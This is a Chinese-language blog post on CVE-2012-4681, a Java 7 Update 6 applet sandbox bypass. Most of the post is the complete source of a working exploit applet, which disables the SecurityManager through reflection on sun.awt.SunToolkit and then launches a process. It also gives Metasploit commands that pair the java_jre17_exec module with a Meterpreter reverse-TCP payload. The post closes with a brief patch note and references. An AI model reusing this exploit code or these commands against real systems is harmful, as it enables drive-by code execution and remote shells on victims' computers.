JRE7u6 Applet绕过沙盒执行恶意代码0day

CVE-2012-4681

描述:

8月份的一个0day,CVE中是这样描述的:
允许远程攻击者构造applet 来调用com.sun.beans.finder.ClassFinder.findClass,从而绕过 SecurityManager的限制。然后 借助 forName方法的一个异常来访问某些package里的限制类,如:sun.awt.SunToolkit,并使用反射的 getField方法来访问和修改私有字段。
在 August 2012 被广泛利用.,EXP为Gondzz.class 和 Gondvv.class。

受影响的版本:Oracle Java SE 7 Update 6 或之前版本

EXP:

import java.applet.Applet;
import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

public class noGondvv extends Applet
{

    public noGondvv()
    {
    }

    public void disableSecurity()
        throws Throwable
    {
        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
        localStatement.execute();
    }

    private Class GetClass(String paramString)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }

    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = paramClass;
        arrayOfObject[1] = paramString;
        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
    }

    public void init()
    {
        try
        {
            disableSecurity();
            Process localProcess = null;
            localProcess = Runtime.getRuntime().exec("cmd.exe /c calc.exe");
            if(localProcess != null);
               localProcess.waitFor();
        }
        catch(Throwable localThrowable)
        {
            localThrowable.printStackTrace();
        }
    }

    public void paint(Graphics paramGraphics)
    {
        paramGraphics.drawString("Loading", 50, 25);
    }
}

MSF 测试:

exploit可以到这里下载,放入msf3相应目录下后 reload_all

msf > use exploit/multi/browser/java_jre17_exec
msf > set PAYLOAD windows/meterpreter/reverse_tcp

修复:

官方补丁,升级到jre7u7及以上

Reference:

http://www.2cto.com/Article/201208/151509.html

http://ha.cker.in/794.seo

Leave a comment

Your email address will not be published. Required fields are marked *